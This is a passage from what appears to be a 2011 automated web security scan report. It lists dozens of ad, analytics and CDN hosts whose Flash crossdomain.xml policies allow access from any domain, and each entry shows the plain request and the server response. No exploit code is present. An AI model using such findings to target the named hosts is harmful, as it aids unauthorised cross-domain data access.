<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.15. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sun, 15 May 2011 21:19:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 16 May 2011 01:19:51 GMT
Date: Mon, 16 May 2011 01:19:51 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.17. http://cdn5.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 710
Content-Type: text/xml
Date: Sun, 15 May 2011 21:31:35 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.18. http://ctix8.cheaptickets.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ctix8.cheaptickets.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:80c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:22:46 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:19:58 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.20. http://dar.youknowbest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dar.youknowbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dar.youknowbest.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://dar.youknowbest.com/crossdomain.xml
Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT
Accept-Ranges: bytes
ETag: "01e78cfe96cb1:de1"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: CO-ADSWEB01
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:41:16 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.21. http://feeds.delicious.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:25:00 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.22. http://fingerhut.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fingerhut.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fingerhut.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:33:11 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 64028
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.25. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2af5"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web205
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 21:19:57 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.26. http://i.w55c.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Mon, 16 May 2011 01:17:20 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

6.27. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.28. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 20:32:17 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.29. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 01:19:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.30. http://metrics.fingerhut.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.fingerhut.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.fingerhut.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:35 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.31. http://metrics.mcafee.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:52 GMT
Server: Omniture DC/2.0.0
xserver: www68
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.32. http://metrics.sonystyle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sonystyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sonystyle.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:59 GMT
Server: Omniture DC/2.0.0
xserver: www201
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.33. http://metrics.us.playstation.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.us.playstation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.us.playstation.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.34. http://nexus2.ensighten.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nexus2.ensighten.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nexus2.ensighten.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:09 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:42:59 GMT
ETag: "4b9cf-145-49793ce00fac0"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

6.35. http://p.brilig.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Mon, 16 May 2011 01:23:25 GMT
ETag: "3a149-ab-4a3053698f340"
Last-Modified: Wed, 11 May 2011 19:38:13 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
X-Brilig-D: D=84
Content-Length: 171
Connection: Close

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>
6.36. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 01:24:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.37. http://pixel.33across.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Mon, 16 May 2011 01:29:35 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

6.38. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.39. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 15 May 2011 20:26:59 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 15 May 2011 20:26:59 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.40. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:30:58 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 22 May 2011 21:30:58 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.41. http://serv.adspeed.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://serv.adspeed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serv.adspeed.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Thu, 27 May 2010 16:12:36 GMT
Content-Length: 357
Connection: close
Date: Mon, 16 May 2011 01:20:34 GMT
Server: AdSpeed/s12

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for AdSpeed Ad Server -->
<cross-domain-policy>
<site-control
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.42. http://sony.links.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 14:45:11 GMT
ETag: "80753121df22c81:320b"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 20:26:33 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

6.43. http://sony.links.origin.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.links.origin.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2dd2"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Sun, 15 May 2011 20:26:47 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

6.44. http://sony.tcliveus.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.tcliveus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.tcliveus.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive
Content-Length: 79
Last-Modified: Sun, 15 May 2011 21:20:49 GMT
Content-Type: application/xml; charset=ISO-8859-1
Date: Sun, 15 May 2011 21:20:49 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Mon, 16-May-11 01:20:49 GMT;path=/

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.45. http://sony.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 15 May 2011 21:19:59 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.46. http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sonycomputerentertai.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 15 May 2011 20:26:46 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
